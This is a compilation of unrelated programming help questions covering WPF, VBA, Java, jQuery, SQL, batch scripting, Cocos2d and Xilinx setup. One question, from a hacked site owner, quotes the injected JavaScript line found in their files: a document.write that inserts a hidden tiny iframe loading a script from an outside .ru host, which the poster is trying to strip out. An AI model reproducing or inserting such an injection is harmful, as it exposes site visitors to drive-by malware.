  • WPF - hiding listbox items

    Hi, I have a listbox where the itemtemplate is using a style. The styles specifies a border with a datatrigger setting the visibility of the border to collapsed depending on a property. This works fine except I can still see a very narrow line for each item, in the list, that is collapsed. I was hoping someone could help with how to set the visibility so that there are no visible traces as this is quite apparent when consecutive items have been collapsed. The datatemplate specifies an outer border with a dockpanel inside of this - there are then stackpanels docked to this. Any help is appreciated.

  • Create xml file based on xPath from Excel with VBA

    I've found some items that seem to dance around what I'm looking to do. I'm not a full-fledged programmer, but have been creating my own macros in Excel. I'm trying to create one now that will help me create the structure of an XML file. I want to go down the list of XPaths, and for each one create any parents in the path as needed as well as the child and its value. I'll be adding another aspect to filter it to the fields I want, but the part I'm struggling with is the logic to check if each parent node exists, create it if needed, then add the child and its value. Bonus would be if the output file were formatted with each node on a new line, and more so if it child nodes were indented from parent, but just creating it is my primary concern. Any help would be much appreciated, this has to potential to save me a lot of time.

So basically I have an array of strings, a question and an answer public static String[][] triviaData = { {"Question2", "Answer1"}, {"Question2", "Answer2"}, {"Question3", "Answer3"}, }; And I am trying to make a method that validates an entered input, lets call the entered input enteredAnswer. enteredAnswer is stored as a String. I am trying to validate that the enteredAnswer is the same as the second index of the array. if (enteredAnswer.equalsIgnoreCase(triviaData[Config.CurrentQuestion][1])) { This is the code I tried, but I get the error "Cannot invoke equalsIgnoreCase(String) on the array type String[]" I am a beginner programmer so if you could help me out it would be highly appreciated.   • Cant handle it (jQuery hanlder understanding needed)

    I'm embarrassed to even ask BUT could someone help me understand what a "handler" is. I am new to jQuery and the API constantly has references similar to the following: toggle( handler(eventObject), handler(eventObject), [ handler(eventObject) ] ) I scratch my head and say to myself "what the hell is a handler". Then I check my 2 jquery books and don't really see anything specific there. I get what an event handler does, it handles an event. But the word handler in the above context confuses me including "eventObject". I tried to google it but could not really find a really clear definition of what exactly a handler is as it relates to jquery. Thanks for your help =]

    Can any one please help me by giving a query or an idea which helps me? I am looking for a query which returns the users and logins in a sql server 2008 r2 instance. If some one has added/updated a user/permissions in next day- if we run a script it should revert all the changes to the previous day status. Let me give you an example On Wednesday the database security is fine On Thursday someone goes into the SQL instance and changes several database user security settings. This creates lots of problems. On Wednesday if we run a script on the SQL instance and it should reset the database user security back to what it was on Wednesday. Someone please help me in this regard, Its very urgent..............Please..........

    I've searched everywhere for this, but I can't seem to find a solution. Perhaps I'm using the wrong terms. Either way, I'm turning to good ol' trusty S.O. to help my find the answer. I have two tables, we'll call them 'tools' and 'installs' tools = id, name, version installs = id, tool_id, user_id The 'tools' table records available tools, which are then installed by a user and recorded in the 'installs' table. Selecting the installed tools are simple enough: SELECT tools.name FROM tools LEFT JOIN installs ON tools.id = installs.tool_id WHERE user_id = 99 ; How do I select the remaining tools -- the ones that have yet to be installed by user #99? I'm sorry if this is painfully obvious, but I just can't seem to figure it out! Thanks for the help!

    I was hacked and have hundreds of .js files with this line of code that I'm trying to get rid of: ;document.write('<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>'); It is the last line of the file, but I think the file contains windows line endings, because when ever I do this: sed -i '/sitecorporatemanagement.ru/d' * it deletes the full content of the file. Can you help me get this to work? I just need that full string deleted. Thank you for all the help you can give.

This is a university program, everything is working fine except when I call my :forLoop method to iterate through 100 numbers (1,1,100) starting at 1 going by 1 til 100 and doing the iteration % 5 (i%%5). for some reason I cannot get this to work. appreciate any help or direction. When I echo %%A it is iterating through all the number perfect.     I've been trying to set a contact listener that creates a joint on contact between two sprites which have their own individual classes. Both sprites are inheriting from NSObject and their are initialized in their parentlayer (init method of HelloWorldLayer.mm). It is quite straightforward when everything is in the same class, but in a case like this where sprites have their own classes how will it be done. Please Help, I've been at it for days.

    I have installed Xilinx 14.7 in ubuntu 14.04 LTS machine(i386 - 64bit). But I am unable to run lmgrd (for starting the license server). When I googled this problem, I found that lsb-core package needs to be installed. But the package is having many dependencies, I want to know how to install lsb-core package with all the necessary dependencies.
